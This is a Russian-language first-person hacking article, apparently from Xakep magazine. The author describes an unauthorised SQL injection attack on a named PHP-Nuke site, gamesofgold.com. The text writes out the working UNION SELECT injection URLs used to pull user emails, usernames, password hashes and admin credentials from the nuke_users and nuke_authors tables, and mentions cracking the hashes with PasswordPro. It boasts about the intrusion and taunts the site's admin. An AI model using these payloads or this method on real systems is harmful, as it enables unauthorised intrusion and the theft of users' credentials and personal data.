Недавно захожу на сайт http://gamesofgold.com своего старого «знакомого», админа злополучного форума http://talkgold.com (мне нужны были урлы egold-инвесторок) и случайно вижу следующую картину: файлу modules.php Php-Nuke передаются следующие параметры:  name=TLS&cat=1. Автоматически, просто по привычке, добавляю кавычку после 1 и получаю знакомый ответ:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gamesof/gamesofgold.com/html/includes/sql_layer.php on line 286

Ну думаю, поехали, откладываю сбор урлов egold-инвесторок на потом, подбираю количество полей:

http://gamesofgold.com/modules.php?name=TLS& cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22/*

Вижу выводится поля 6 и 9, дальше начинаю подбирать имена таблиц, вручную этого делать не хотелось, поэтому запускаю SQL Injection Tools на перебор и в ответ ничего не получаю. Естественно, имена таблиц и полей в Php-Nuke отличаются от имеющихся в небольшой базе SQL Injection Tools. Нахожу на диске Xakepа версию 7.1 Php-Nuke и ставлю у себя на локальном сервере.

Захожу в MySQL базу Php-Nuke, вижу название таблицы nuke_users, выполняю запрос и точно есть:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_users/*

Пробую вывести значение поля 6:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,user_email,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22+from+nuke_users/*

мыла зарегистрированных юзеров у меня, забираю логины и хеши-пароли из полей username и user_password.

Ну и на последок, воспользовавшись конструкцией limit, еще раз сверяю пароль и логин админа

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,username,7,8,user_password,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_users+limit%202,1/*

не забывая извлечь его логин и пароль также из таблицы nuke_authors:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,aid,7,8,pwd,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_authors/*

и скармливаю их PasswordPro, а после возвращаюсь к сбору урлов живых egold-инвесторок.

Ну вроде и все. Вывод файлов через load_file () не сработал, мне показали сообщение, что «я не нравлюсь админу». Ну и слава Богу. Хоть здесь админ натурал, хоть и криворукий.

А вы, если будете на gamesofgold.com, передавайте ему привет от durito.

Оставить мнение

Check Also

Хакер ищет авторов. Читатель? Хакер? Программист? Безопасник? Мы тебе рады!

Восемнадцать лет мы делаем лучшее во всем русскоязычном пространстве издание по IT и инфор…